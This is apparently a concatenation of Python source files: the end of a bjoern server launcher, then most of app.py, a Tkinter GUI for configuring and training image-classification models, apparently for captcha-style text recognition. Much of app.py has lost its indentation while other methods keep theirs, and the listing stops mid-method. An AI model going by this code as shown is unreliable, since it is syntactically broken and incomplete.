        bjoern.run(app, 'unix:%s' % args.unix_socket, listen_backlog=10000)
    except KeyboardInterrupt:
        LOGGER.debug("process (normal) shutdown")
    except Exception:
        LOGGER.exception("uncatched exception")
    # Best-effort cleanup of the socket file on shutdown
    try:
        os.remove(args.unix_socket)
    except Exception:
        pass
if __name__ == '__main__':  # script entry point
    main()
|
app.py | import os
import re
import math
import sys
import shutil
import json
import traceback
import PIL.Image as PilImage
import threading
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
from tkinter import filedialog
from constants import *
from config import ModelConfig, OUTPUT_SHAPE1_MAP, NETWORK_MAP, DataAugmentationEntity, PretreatmentEntity
from make_dataset import DataSets
from predict_testing import Predict
from trains import Trains
from category import category_extract, SIMPLE_CATEGORY_MODEL
from gui.utils import LayoutGUI
from gui.data_augmentation import DataAugmentationDialog
from gui.pretreatment import PretreatmentDialog
class Wizard:
job: threading.Thread
current_task: Trains
is_task_running: bool = False
data_augmentation_entity = DataAugmentationEntity()
pretreatment_entity = PretreatmentEntity()
def __init__(self, parent: tk.Tk):
self.layout = {
'global': {
'start': {'x': 15, 'y': 20},
'space': {'x': 15, 'y': 25},
'tiny_space': {'x': 5, 'y': 10}
}
}
self.parent = parent
self.parent.iconbitmap(Wizard.resource_path("resource/icon.ico"))
self.current_project: str = ""
self.project_root_path = "./projects"
if not os.path.exists(self.project_root_path):
os.makedirs(self.project_root_path)
self.parent.title('Image Classification Wizard Tool based on Deep Learning')
self.parent.resizable(width=False, height=False)
self.window_width = 815
self.window_height = 700
self.layout_utils = LayoutGUI(self.layout, self.window_width)
screenwidth = self.parent.winfo_screenwidth()
screenheight = self.parent.winfo_screenheight()
size = '%dx%d+%d+%d' % (
self.window_width,
self.window_height,
(screenwidth - self.window_width) / 2,
(screenheight - self.window_height) / 2
)
self.parent.bind('<Button-1>', lambda x: self.blank_click(x))
# ============================= Menu 1 =====================================
self.menubar = tk.Menu(self.parent)
self.data_menu = tk.Menu(self.menubar, tearoff=False)
self.help_menu = tk.Menu(self.menubar, tearoff=False)
self.system_menu = tk.Menu(self.menubar, tearoff=False)
self.edit_var = tk.DoubleVar()
self.memory_usage_menu = tk.Menu(self.menubar, tearoff=False)
self.memory_usage_menu.add_radiobutton(label="50%", variable=self.edit_var, value=0.5)
self.memory_usage_menu.add_radiobutton(label="60%", variable=self.edit_var, value=0.6)
self.memory_usage_menu.add_radiobutton(label="70%", variable=self.edit_var, value=0.7)
self.memory_usage_menu.add_radiobutton(label="80%", variable=self.edit_var, value=0.8)
self.menubar.add_cascade(label="System", menu=self.system_menu)
self.system_menu.add_cascade(label="Memory Usage", menu=self.memory_usage_menu)
self.data_menu.add_command(label="Data Augmentation", command=lambda: self.popup_data_augmentation())
self.data_menu.add_command(label="Pretreatment", command=lambda: self.popup_pretreatment())
self.data_menu.add_separator()
self.data_menu.add_command(label="Clear Dataset", command=lambda: self.clear_dataset())
self.menubar.add_cascade(label="Data", menu=self.data_menu)
self.help_menu.add_command(label="About", command=lambda: self.popup_about())
self.menubar.add_cascade(label="Help", menu=self.help_menu)
self.parent.config(menu=self.menubar)
# ============================= Group 1 =====================================
self.label_frame_source = ttk.Labelframe(self.parent, text='Sample Source')
self.label_frame_source.place(
x=self.layout['global']['start']['x'],
y=self.layout['global']['start']['y'],
width=790,
height=150
)
# 训练集源路径 - 标签
self.dataset_train_path_text = ttk.Label(self.parent, text='Training Path', anchor=tk.W)
self.layout_utils.inside_widget(
src=self.dataset_train_path_text,
target=self.label_frame_source,
width=90,
height=20
)
# 训练集源路径 - 输入控件
self.source_train_path_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.layout_utils.next_to_widget(
src=self.source_train_path_listbox,
target=self.dataset_train_path_text,
width=600,
height=50,
tiny_space=True
)
self.source_train_path_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.source_train_path_listbox)
)
self.listbox_scrollbar(self.source_train_path_listbox)
# 训练集源路径 - 按钮
self.btn_browse_train = ttk.Button(
self.parent, text='Browse', command=lambda: self.browse_dataset(DatasetType.Directory, RunMode.Trains)
)
self.layout_utils.next_to_widget(
src=self.btn_browse_train,
target=self.source_train_path_listbox,
width=60,
height=24,
tiny_space=True
)
# 验证集源路径 - 标签
label_edge = self.layout_utils.object_edge_info(self.dataset_train_path_text)
widget_edge = self.layout_utils.object_edge_info(self.source_train_path_listbox)
self.dataset_validation_path_text = ttk.Label(self.parent, text='Validation Path', anchor=tk.W)
self.dataset_validation_path_text.place(
x=label_edge['x'],
y=widget_edge['edge_y'] + self.layout['global']['space']['y'] / 2,
width=90,
height=20
)
# 验证集源路径 - 输入控件
self.source_validation_path_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.layout_utils.next_to_widget(
src=self.source_validation_path_listbox,
target=self.dataset_validation_path_text,
width=600,
height=50,
tiny_space=True
)
self.source_validation_path_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.source_validation_path_listbox)
)
self.listbox_scrollbar(self.source_validation_path_listbox)
# 训练集源路径 - 按钮
self.btn_browse_validation = ttk.Button(
self.parent, text='Browse', command=lambda: self.browse_dataset(DatasetType.Directory, RunMode.Validation)
)
self.layout_utils.next_to_widget(
src=self.btn_browse_validation,
target=self.source_validation_path_listbox,
width=60,
height=24,
tiny_space=True
)
# ============================= Group 2 =====================================
self.label_frame_neu = ttk.Labelframe(self.parent, text='Neural Network')
self.layout_utils.below_widget(
src=self.label_frame_neu,
target=self.label_frame_source,
width=790,
height=120,
tiny_space=False
)
# 最大标签数目 - 标签
self.label_num_text = ttk.Label(self.parent, text='Label Num', anchor=tk.W)
self.layout_utils.inside_widget(
src=self.label_num_text,
target=self.label_frame_neu,
width=65,
height=20,
)
# 最大标签数目 - 滚动框
self.label_num_spin = ttk.Spinbox(self.parent, from_=1, to=12)
self.label_num_spin.set(1)
self.layout_utils.next_to_widget(
src=self.label_num_spin,
target=self.label_num_text,
width=50,
height=20,
tiny_space=True
)
# 图像通道 - 标签
self.channel_text = ttk.Label(self.parent, text='Channel', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.channel_text,
target=self.label_num_spin,
width=50,
height=20,
tiny_space=False
)
# 图像通道 - 下拉框
self.comb_channel = ttk.Combobox(self.parent, values=(3, 1), state='readonly')
self.comb_channel.current(0)
self.layout_utils.next_to_widget(
src=self.comb_channel,
target=self.channel_text,
width=38,
height=20,
tiny_space=True
)
# 卷积层 - 标签
self.neu_cnn_text = ttk.Label(self.parent, text='CNN Layer', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.neu_cnn_text,
target=self.comb_channel,
width=65,
height=20,
tiny_space=False
)
# 卷积层 - 下拉框
self.comb_neu_cnn = ttk.Combobox(self.parent, values=[_.name for _ in CNNNetwork], state='readonly')
self.comb_neu_cnn.current(0)
self.layout_utils.next_to_widget(
src=self.comb_neu_cnn,
target=self.neu_cnn_text,
width=80,
height=20,
tiny_space=True
)
# 循环层 - 标签
self.neu_recurrent_text = ttk.Label(self.parent, text='Recurrent Layer', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.neu_recurrent_text,
target=self.comb_neu_cnn,
width=95,
height=20,
tiny_space=False
)
# 循环层 - 下拉框
self.comb_recurrent = ttk.Combobox(self.parent, values=[_.name for _ in RecurrentNetwork], state='readonly')
self.comb_recurrent.current(0)
self.layout_utils.next_to_widget(
src=self.comb_recurrent,
target=self.neu_recurrent_text,
width=112,
height=20,
tiny_space=True
)
self.comb_recurrent.bind("<<ComboboxSelected>>", lambda x: self.auto_loss(x))
# 循环层单元数 - 标签
self.units_num_text = ttk.Label(self.parent, text='UnitsNum', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.units_num_text,
target=self.comb_recurrent,
width=60,
height=20,
tiny_space=False
)
# 循环层单元数 - 下拉框
self.units_num_spin = ttk.Spinbox(self.parent, from_=16, to=512, increment=16, wrap=True)
self.units_num_spin.set(64)
self.layout_utils.next_to_widget(
src=self.units_num_spin,
target=self.units_num_text,
width=55,
height=20,
tiny_space=True
)
# 损失函数 - 标签
self.loss_func_text = ttk.Label(self.parent, text='Loss Function', anchor=tk.W)
self.layout_utils.below_widget(
src=self.loss_func_text,
target=self.label_num_text,
width=85,
height=20,
tiny_space=True
)
# 损失函数 - 下拉框
self.comb_loss = ttk.Combobox(self.parent, values=[_.name for _ in LossFunction], state='readonly')
self.comb_loss.current(0)
self.layout_utils.next_to_widget(
src=self.comb_loss,
target=self.loss_func_text,
width=101,
height=20,
tiny_space=True
)
# 优化器 - 标签
self.optimizer_text = ttk.Label(self.parent, text='Optimizer', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.optimizer_text,
target=self.comb_loss,
width=60,
height=20,
tiny_space=False
)
# 优化器 - 下拉框
self.comb_optimizer = ttk.Combobox(self.parent, values=[_.name for _ in Optimizer], state='readonly')
self.comb_optimizer.current(0)
self.layout_utils.next_to_widget(
src=self.comb_optimizer,
target=self.optimizer_text,
width=88,
height=20,
tiny_space=True
)
# 学习率 - 标签
self.learning_rate_text = ttk.Label(self.parent, text='Learning Rate', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.learning_rate_text,
target=self.comb_optimizer,
width=85,
height=20,
tiny_space=False
)
# 学习率 - 滚动框
self.learning_rate_spin = ttk.Spinbox(self.parent, from_=0.00001, to=0.1, increment='0.0001')
self.learning_rate_spin.set(0.001)
self.layout_utils.next_to_widget(
src=self.learning_rate_spin,
target=self.learning_rate_text,
width=67,
height=20,
tiny_space=True
)
# Resize - 标签
self.resize_text = ttk.Label(self.parent, text='Resize', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.resize_text,
target=self.learning_rate_spin,
width=36,
height=20,
tiny_space=False
)
# Resize - 输入框
self.resize_val = tk.StringVar()
self.resize_val.set('[150, 50]')
self.resize_entry = ttk.Entry(self.parent, textvariable=self.resize_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.resize_entry,
target=self.resize_text,
width=60,
height=20,
tiny_space=True
)
# Size - 标签
self.size_text = ttk.Label(self.parent, text='Size', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.size_text,
target=self.resize_entry,
width=30,
height=20,
tiny_space=False
)
# Size - 输入框
self.size_val = tk.StringVar()
self.size_val.set('[-1, -1]')
self.size_entry = ttk.Entry(self.parent, textvariable=self.size_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.size_entry,
target=self.size_text,
width=60,
height=20,
tiny_space=True
)
# 类别 - 标签
self.category_text = ttk.Label(self.parent, text='Category', anchor=tk.W)
self.layout_utils.below_widget(
src=self.category_text,
target=self.loss_func_text,
width=72,
height=20,
tiny_space=True
)
# 类别 - 下拉框
self.comb_category = ttk.Combobox(self.parent, values=(
'CUSTOMIZED',
'NUMERIC',
'ALPHANUMERIC',
'ALPHANUMERIC_LOWER',
'ALPHANUMERIC_UPPER',
'ALPHABET_LOWER',
'ALPHABET_UPPER',
'ALPHABET',
'ARITHMETIC',
'FLOAT',
'CHS_3500',
'ALPHANUMERIC_CHS_3500_LOWER'
), state='readonly')
self.comb_category.current(1)
self.comb_category.bind("<<ComboboxSelected>>", lambda x: self.comb_category_callback(x))
self.layout_utils.next_to_widget(
src=self.comb_category,
target=self.category_text,
width=225,
height=20,
tiny_space=True
)
# 类别 - 自定义输入框
self.category_val = tk.StringVar()
self.category_val.set('')
self.category_entry = ttk.Entry(self.parent, textvariable=self.category_val, justify=tk.LEFT, state=tk.DISABLED)
self.layout_utils.next_to_widget(
src=self.category_entry,
target=self.comb_category,
width=440,
height=20,
tiny_space=False
)
# ============================= Group 3 =====================================
self.label_frame_train = ttk.Labelframe(self.parent, text='Training Configuration')
self.layout_utils.below_widget(
src=self.label_frame_train,
target=self.label_frame_neu,
width=790,
height=60,
tiny_space=True
)
# 任务完成标准 - 准确率 - 标签
self.end_acc_text = ttk.Label(self.parent, text='End Accuracy', anchor=tk.W)
self.layout_utils.inside_widget(
src=self.end_acc_text,
target=self.label_frame_train,
width=85,
height=20,
)
# 任务完成标准 - 准确率 - 输入框
self.end_acc_val = tk.DoubleVar()
self.end_acc_val.set(0.95)
self.end_acc_entry = ttk.Entry(self.parent, textvariable=self.end_acc_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.end_acc_entry,
target=self.end_acc_text,
width=56,
height=20,
tiny_space=True
)
# 任务完成标准 - 平均损失 - 标签
self.end_cost_text = ttk.Label(self.parent, text='End Cost', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.end_cost_text,
target=self.end_acc_entry,
width=60,
height=20,
tiny_space=False
)
# 任务完成标准 - 平均损失 - 输入框
self.end_cost_val = tk.DoubleVar()
self.end_cost_val.set(0.5)
self.end_cost_entry = ttk.Entry(self.parent, textvariable=self.end_cost_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.end_cost_entry,
target=self.end_cost_text,
width=58,
height=20,
tiny_space=True
)
# 任务完成标准 - 循环轮次 - 标签
self.end_epochs_text = ttk.Label(self.parent, text='End Epochs', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.end_epochs_text,
target=self.end_cost_entry,
width=72,
height=20,
tiny_space=False
)
# 任务完成标准 - 循环轮次 - 输入框
self.end_epochs_spin = ttk.Spinbox(self.parent, from_=0, to=10000)
self.end_epochs_spin.set(2)
self.layout_utils.next_to_widget(
src=self.end_epochs_spin,
target=self.end_epochs_text,
width=50,
height=20,
tiny_space=True
)
# 训练批次大小 - 标签
self.batch_size_text = ttk.Label(self.parent, text='Train BatchSize', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.batch_size_text,
target=self.end_epochs_spin,
width=90,
height=20,
tiny_space=False
)
# 训练批次大小 - 输入框
self.batch_size_val = tk.IntVar()
self.batch_size_val.set(64)
self.batch_size_entry = ttk.Entry(self.parent, textvariable=self.batch_size_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.batch_size_entry,
target=self.batch_size_text,
width=40,
height=20,
tiny_space=True
)
# 验证批次大小 - 标签
self.validation_batch_size_text = ttk.Label(self.parent, text='Validation BatchSize', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.validation_batch_size_text,
target=self.batch_size_entry,
width=120,
height=20,
tiny_space=False
)
# 验证批次大小 - 输入框
self.validation_batch_size_val = tk.IntVar()
self.validation_batch_size_val.set(300)
self.validation_batch_size_entry = ttk.Entry(self.parent, textvariable=self.validation_batch_size_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.validation_batch_size_entry,
target=self.validation_batch_size_text,
width=40,
height=20,
tiny_space=True
)
# ============================= Group 5 =====================================
self.label_frame_project = ttk.Labelframe(self.parent, text='Project Configuration')
self.layout_utils.below_widget(
src=self.label_frame_project,
target=self.label_frame_train,
width=790,
height=60,
tiny_space=True
)
# 项目名 - 标签
self.project_name_text = ttk.Label(self.parent, text='Project Name', anchor=tk.W)
self.layout_utils.inside_widget(
src=self.project_name_text,
target=self.label_frame_project,
width=90,
height=20
)
# 项目名 - 下拉输入框
self.comb_project_name = ttk.Combobox(self.parent)
self.layout_utils.next_to_widget(
src=self.comb_project_name,
target=self.project_name_text,
width=430,
height=20,
tiny_space=True
)
self.comb_project_name.bind(
sequence="<Return>",
func=lambda x: self.project_name_fill_callback(x)
)
self.comb_project_name.bind(
sequence="<Button-1>",
func=lambda x: self.fetch_projects()
)
self.comb_project_name.bind("<<ComboboxSelected>>", lambda x: self.read_conf(x))
# 保存配置 - 按钮
self.btn_save_conf = ttk.Button(
self.parent, text='Save Configuration', command=lambda: self.save_conf()
)
self.layout_utils.next_to_widget(
src=self.btn_save_conf,
target=self.comb_project_name,
width=130,
height=24,
tiny_space=False,
offset_y=-2
)
# 删除项目 - 按钮
self.btn_delete = ttk.Button(
self.parent, text='Delete', command=lambda: self.delete_project()
)
self.layout_utils.next_to_widget(
src=self.btn_delete,
target=self.btn_save_conf,
width=80,
height=24,
tiny_space=False,
)
# ============================= Group 6 =====================================
self.label_frame_dataset = ttk.Labelframe(
self.parent, text='Sample Dataset'
)
self.layout_utils.below_widget(
src=self.label_frame_dataset,
target=self.label_frame_project,
width=790,
height=170,
tiny_space=True
)
# 附加训练集 - 按钮
self.btn_attach_dataset = ttk.Button(
self.parent,
text='Attach Dataset',
command=lambda: self.attach_dataset()
)
self.layout_utils.inside_widget(
src=self.btn_attach_dataset,
target=self.label_frame_dataset,
width=120,
height=24,
)
# 附加训练集 - 显示框
self.attach_dataset_val = tk.StringVar()
self.attach_dataset_val.set('')
self.attach_dataset_entry = ttk.Entry(
self.parent, textvariable=self.attach_dataset_val, justify=tk.LEFT, state=tk.DISABLED
)
self.layout_utils.next_to_widget(
src=self.attach_dataset_entry,
target=self.btn_attach_dataset,
width=420,
height=24,
tiny_space=True
)
# 验证集数目 - 标签
self.validation_num_text = ttk.Label(self.parent, text='Validation Set Num', anchor=tk.W)
self.layout_utils.next_to_widget(
src=self.validation_num_text,
target=self.attach_dataset_entry,
width=120,
height=20,
tiny_space=False,
offset_y=2
)
# 验证集数目 - 输入框
self.validation_num_val = tk.IntVar()
self.validation_num_val.set(300)
self.validation_num_entry = ttk.Entry(self.parent, textvariable=self.validation_num_val, justify=tk.LEFT)
self.layout_utils.next_to_widget(
src=self.validation_num_entry,
target=self.validation_num_text,
width=71,
height=20,
tiny_space=True
)
# 训练集路径 - 标签
self.dataset_train_path_text = ttk.Label(self.parent, text='Training Dataset', anchor=tk.W)
self.layout_utils.below_widget(
src=self.dataset_train_path_text,
target=self.btn_attach_dataset,
width=100,
height=20,
tiny_space=False
)
# 训练集路径 - 列表框
self.dataset_train_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.layout_utils.next_to_widget(
src=self.dataset_train_listbox,
target=self.dataset_train_path_text,
width=640,
height=36,
tiny_space=False
)
self.dataset_train_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.dataset_train_listbox)
)
self.listbox_scrollbar(self.dataset_train_listbox)
# 验证集路径 - 标签
label_edge = self.layout_utils.object_edge_info(self.dataset_train_path_text)
widget_edge = self.layout_utils.object_edge_info(self.dataset_train_listbox)
self.dataset_validation_path_text = ttk.Label(self.parent, text='Validation Dataset', anchor=tk.W)
self.dataset_validation_path_text.place(
x=label_edge['x'],
y=widget_edge['edge_y'] + self.layout['global']['space']['y'] / 2,
width=100,
height=20
)
# 验证集路径 - 下拉输入框
self.dataset_validation_listbox = tk.Listbox(self.parent, font=('微软雅黑', 9))
self.layout_utils.next_to_widget(
src=self.dataset_validation_listbox,
target=self.dataset_validation_path_text,
width=640,
height=36,
tiny_space=False
)
self.dataset_validation_listbox.bind(
sequence="<Delete>",
func=lambda x: self.listbox_delete_item_callback(x, self.dataset_validation_listbox)
)
self.listbox_scrollbar(self.dataset_validation_listbox)
self.sample_map = {
DatasetType.Directory: {
RunMode.Trains: self.source_train_path_listbox,
RunMode.Validation: self.source_validation_path_listbox
},
DatasetType.TFRecords: {
RunMode.Trains: self.dataset_train_listbox,
RunMode.Validation: self.dataset_validation_listbox
}
}
# 开始训练 - 按钮
self.btn_training = ttk.Button(self.parent, text='Start Training', command=lambda: self.start_training())
self.layout_utils.widget_from_right(
src=self.btn_training,
target=self.label_frame_dataset,
width=120,
height=24,
tiny_space=True
)
# 终止训练 - 按钮
self.btn_stop = ttk.Button(self.parent, text='Stop', command=lambda: self.stop_training())
self.button_state(self.btn_stop, tk.DISABLED)
self.layout_utils.before_widget(
src=self.btn_stop,
target=self.btn_training,
width=60,
height=24,
tiny_space=True
)
# 编译模型 - 按钮
self.btn_compile = ttk.Button(self.parent, text='Compile', command=lambda: self.compile())
self.layout_utils.before_widget(
src=self.btn_compile,
target=self.btn_stop,
width=80,
height=24,
tiny_space=True
)
# 打包训练集 - 按钮
self.btn_make_dataset = ttk.Button(self.parent, text='Make Dataset', command=lambda: self.make_dataset())
self.layout_utils.before_widget(
src=self.btn_make_dataset,
target=self.btn_compile,
width=120,
height=24,
tiny_space=True
)
# 清除训练记录 - 按钮
self.btn_reset_history = ttk.Button(
self.parent, text='Reset History', command=lambda: self.reset_history()
)
self.layout_utils.before_widget(
src=self.btn_reset_history,
target=self.btn_make_dataset,
width=120,
height=24,
tiny_space=True
)
# 预测 - 按钮
self.btn_testing = ttk.Button(
self.parent, text='Testing', command=lambda: self.testing_model()
)
self.layout_utils.before_widget(
src=self.btn_testing,
target=self.btn_reset_history,
width=80,
height=24,
tiny_space=True
)
self.parent.geometry(size)
@staticmethod
def threading_exec(func, *args) -> threading.Thread:
th = threading.Thread(target=func, args=args)
th.setDaemon(True)
th.start()
return th
def popup_data_augmentation(self):
    """Open the data-augmentation dialog for the active project."""
    # A project must be selected before its augmentation settings can be edited.
    if not self.current_project:
        messagebox.showerror(
            "Error!", "Please set the project name first."
        )
        return
    dialog = DataAugmentationDialog()
    dialog.read_conf(self.data_augmentation_entity)
def popup_pretreatment(self):
    """Open the image-pretreatment dialog for the active project."""
    # A project must be selected before its pretreatment settings can be edited.
    if not self.current_project:
        messagebox.showerror(
            "Error!", "Please set the project name first."
        )
        return
    dialog = PretreatmentDialog()
    dialog.read_conf(self.pretreatment_entity)
@staticmethod
def listbox_scrollbar(listbox: tk.Listbox):
    """Attach a vertical scrollbar to *listbox* and wire the two together."""
    scrollbar = tk.Scrollbar(listbox, command=listbox.yview)
    scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
    listbox.config(yscrollcommand=scrollbar.set)
def blank_click(self, event):
    """Treat a click elsewhere as a name-fill event when the project name was edited."""
    typed_name = self.comb_project_name.get()
    if typed_name != self.current_project:
        self.project_name_fill_callback(event)
def project_name_fill_callback(self, event):
"""Append an architecture suffix to a newly typed project name, then refresh dataset paths."""
# Suffix encodes CNN, recurrent net, hidden units, loss and channel count.
suffix = '-{}-{}-H{}-{}-C{}'.format(
self.comb_neu_cnn.get(),
self.comb_recurrent.get(),
self.units_num_spin.get(),
self.comb_loss.get(),
self.comb_channel.get(),
)
current_project_name = self.comb_project_name.get()
# Only decorate names that are new (not an existing project directory).
if len(current_project_name) > 0 and current_project_name not in self.project_names:
self.sample_map[DatasetType.Directory][RunMode.Trains].delete(0, tk.END)
self.sample_map[DatasetType.Directory][RunMode.Validation].delete(0, tk.END)
if not current_project_name.endswith(suffix):
self.comb_project_name.insert(tk.END, suffix)
self.current_project = self.comb_project_name.get()
# Reset both TFRecords listboxes to the new project's default paths.
self.update_dataset_files_path(mode=RunMode.Trains)
self.update_dataset_files_path(mode=RunMode.Validation)
@property
def project_path(self):
    """Path of the current project's directory, created on demand.

    Returns None when no project is selected.
    """
    if not self.current_project:
        return None
    path = "{}/{}".format(self.project_root_path, self.current_project)
    if not os.path.exists(path):
        os.makedirs(path)
    return path
def update_dataset_files_path(self, mode: RunMode):
"""Reset the TFRecords listbox for *mode* to the project's default record path and save."""
dataset_name = "dataset/{}.0.tfrecords".format(mode.value)
dataset_path = os.path.join(self.project_path, dataset_name)
# Normalise Windows separators so stored paths are portable.
dataset_path = dataset_path.replace("\\", '/')
self.sample_map[DatasetType.TFRecords][mode].delete(0, tk.END)
self.sample_map[DatasetType.TFRecords][mode].insert(tk.END, dataset_path)
self.save_conf()
def attach_dataset(self):
    """Attach an extra sample directory to the current project and build
    incremental TFRecords from it on a background thread.

    Refuses while a task is running or when no project is selected.
    (Cleanup: removed a dead trailing `pass` statement.)
    """
    if self.is_task_running:
        messagebox.showerror(
            "Error!", "Please terminate the current training first or wait for the training to end."
        )
        return
    if not self.current_project:
        messagebox.showerror(
            "Error!", "Please set the project name first."
        )
        return
    filename = filedialog.askdirectory()
    if not filename:
        return
    model_conf = ModelConfig(self.current_project)
    if not self.check_dataset(model_conf):
        return
    self.attach_dataset_val.set(filename)
    self.sample_map[DatasetType.Directory][RunMode.Trains].insert(tk.END, filename)
    # Disable the button while the background make_dataset job runs.
    self.button_state(self.btn_attach_dataset, tk.DISABLED)
    for mode in [RunMode.Trains, RunMode.Validation]:
        attached_dataset_name = model_conf.dataset_increasing_name(mode)
        attached_dataset_name = "dataset/{}".format(attached_dataset_name)
        attached_dataset_path = os.path.join(self.project_path, attached_dataset_name)
        attached_dataset_path = attached_dataset_path.replace("\\", '/')
        # Skip the validation record when no validation samples are requested.
        if mode == RunMode.Validation and self.validation_num_val.get() == 0:
            continue
        self.sample_map[DatasetType.TFRecords][mode].insert(tk.END, attached_dataset_path)
    self.save_conf()
    # Re-read the configuration that save_conf() just wrote.
    model_conf = ModelConfig(self.current_project)
    self.threading_exec(
        lambda: DataSets(model_conf).make_dataset(
            trains_path=filename,
            is_add=True,
            callback=lambda: self.button_state(self.btn_attach_dataset, tk.NORMAL),
            msg=lambda x: tk.messagebox.showinfo('Attach Dataset Status', x)
        )
    )
@staticmethod
def button_state(btn: ttk.Button, state: str):
btn['state'] = state
def delete_project(self):
    """Delete the current project's folder after safety checks.

    Refuses while a task is running; reports filesystem errors and only
    reports success when the removal actually worked.
    """
    if not self.current_project:
        messagebox.showerror(
            "Error!", "Please select a project to delete."
        )
        return
    if self.is_task_running:
        messagebox.showerror(
            "Error!", "Please terminate the current training first or wait for the training to end."
        )
        return
    project_path = "./projects/{}".format(self.current_project)
    try:
        shutil.rmtree(project_path)
    except Exception as e:
        messagebox.showerror(
            "Error!", json.dumps(e.args, ensure_ascii=False)
        )
        # Bug fix: previously fell through and reported success after a failure.
        return
    # Bug fix: the success dialog was mistakenly titled "Error!".
    messagebox.showinfo(
        "Success!", "Delete successful!"
    )
    self.comb_project_name.delete(0, tk.END)
def reset_history(self):
    """Delete the current project's model/checkpoint history after safety checks."""
    if not self.current_project:
        messagebox.showerror(
            "Error!", "Please select a project first."
        )
        return
    if self.is_task_running:
        messagebox.showerror(
            "Error!", "Please terminate the current training first or wait for the training to end."
        )
        return
    project_history_path = "./projects/{}/model".format(self.current_project)
    try:
        shutil.rmtree(project_history_path)
    except Exception as e:
        messagebox.showerror(
            "Error!", json.dumps(e.args, ensure_ascii=False)
        )
        # Bug fix: previously fell through and reported success after a failure.
        return
    # Bug fix: the success dialog was mistakenly titled "Error!".
    messagebox.showinfo(
        "Success!", "Delete history successful!"
    )
def testing_model(self):
"""Run the current model against a user-chosen directory of test images."""
filename = filedialog.askdirectory()
if not filename:
return
filename = filename.replace("\\", "/")
predict = Predict(project_name=self.current_project)
# Limit the test run to one validation batch worth of images.
predict.testing(image_dir=filename, limit=self.validation_batch_size)
def clear_dataset(self):
    """Delete the current project's TFRecords dataset folder and prune the listboxes."""
    if not self.current_project:
        messagebox.showerror(
            "Error!", "Please select a project first."
        )
        return
    if self.is_task_running:
        messagebox.showerror(
            "Error!", "Please terminate the current training first or wait for the training to end."
        )
        return
    project_history_path = "./projects/{}/dataset".format(self.current_project)
    try:
        shutil.rmtree(project_history_path)
        # NOTE(review): deletion starts at index 1, keeping the first (base)
        # record entry in each listbox — confirm this is intended.
        self.dataset_train_listbox.delete(1, tk.END)
        self.dataset_validation_listbox.delete(1, tk.END)
    except Exception as e:
        messagebox.showerror(
            "Error!", json.dumps(e.args, ensure_ascii=False)
        )
        # Bug fix: previously fell through and reported success after a failure.
        return
    # Bug fix: the success dialog was mistakenly titled "Error!".
    messagebox.showinfo(
        "Success!", "Clear dataset successful!"
    )
@staticmethod
def popup_about():
    """Show the About dialog with version and contact information."""
    messagebox.showinfo("About", "Image Classification Wizard Tool based on Deep Learning 1.0\n\nAuthor's mailbox: kerlomz@gmail.com\n\nQQ Group: 857149419")
def auto_loss(self, event):
    """Force the CrossEntropy loss when no recurrent layer is selected."""
    recurrent_choice = self.comb_recurrent.get()
    if recurrent_choice == 'NoRecurrent':
        self.comb_loss.set("CrossEntropy")
@staticmethod
def get_param(src: dict, key, default=None):
result = src.get(key)
return result if result else default
def read_conf(self, event):
"""Load the selected project's ModelConfig and mirror every field into the GUI widgets.

:param event: combobox-selection event (unused beyond triggering)
:return: the loaded ModelConfig
"""
selected = self.comb_project_name.get()
self.current_project = selected
model_conf = ModelConfig(selected)
self.edit_var.set(model_conf.memory_usage)
self.size_val.set("[{}, {}]".format(model_conf.image_width, model_conf.image_height))
self.resize_val.set(json.dumps(model_conf.resize))
# Clear all four dataset listboxes before repopulating them.
self.source_train_path_listbox.delete(0, tk.END)
self.source_validation_path_listbox.delete(0, tk.END)
self.dataset_validation_listbox.delete(0, tk.END)
self.dataset_train_listbox.delete(0, tk.END)
for source_train in self.get_param(model_conf.trains_path, DatasetType.Directory, default=[]):
self.source_train_path_listbox.insert(tk.END, source_train)
for source_validation in self.get_param(model_conf.validation_path, DatasetType.Directory, default=[]):
self.source_validation_path_listbox.insert(tk.END, source_validation)
# Network / hyper-parameter widgets.
self.label_num_spin.set(model_conf.max_label_num)
self.comb_channel.set(model_conf.image_channel)
self.comb_neu_cnn.set(model_conf.neu_cnn_param)
self.comb_recurrent.set(model_conf.neu_recurrent_param)
self.units_num_spin.set(model_conf.units_num)
self.comb_loss.set(model_conf.loss_func_param)
# A list-valued category means a user-customised character set.
if isinstance(model_conf.category_param, list):
self.category_entry['state'] = tk.NORMAL
self.comb_category.set('CUSTOMIZED')
self.category_val.set(json.dumps(model_conf.category_param, ensure_ascii=False))
else:
self.category_entry['state'] = tk.DISABLED
self.comb_category.set(model_conf.category_param)
self.comb_optimizer.set(model_conf.neu_optimizer_param)
self.learning_rate_spin.set(model_conf.trains_learning_rate)
self.end_acc_val.set(model_conf.trains_end_acc)
self.end_cost_val.set(model_conf.trains_end_cost)
self.end_epochs_spin.set(model_conf.trains_end_epochs)
self.batch_size_val.set(model_conf.batch_size)
self.validation_batch_size_val.set(model_conf.validation_batch_size)
self.validation_num_val.set(model_conf.validation_set_num)
# Data-augmentation settings (edited via the augmentation dialog).
